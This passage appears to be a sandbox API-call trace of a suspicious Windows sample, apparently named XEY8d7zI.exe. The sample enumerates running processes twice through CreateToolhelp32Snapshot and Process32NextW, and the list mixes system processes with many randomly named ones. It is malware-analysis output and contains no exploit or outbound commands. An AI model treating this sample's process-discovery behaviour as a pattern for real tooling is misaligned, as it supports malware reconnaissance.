th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0137.140] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0137.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0137.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0137.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0137.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.148] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0137.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0137.153] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0137.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0137.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0137.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0137.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0137.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0137.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0137.164] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0137.203] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0137.205] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0137.206] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0137.207] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0137.209] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0137.210] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0137.212] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0137.213] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0137.215] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0137.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0137.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0137.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0137.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0137.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0137.223] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0137.225] CloseHandle (hObject=0xc4) returned 1 [0137.225] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0137.231] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0137.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0137.306] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.307] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0137.308] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.309] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0137.309] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0137.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0137.313] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0137.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.315] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.317] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0137.319] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.321] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0137.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.324] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.325] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0137.327] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0137.328] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0137.330] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.331] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.333] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0137.334] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0137.336] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0137.337] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0137.338] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0137.340] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0137.341] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0137.343] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0137.344] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0137.398] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0137.400] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0137.401] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0137.402] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0137.404] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0137.405] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, 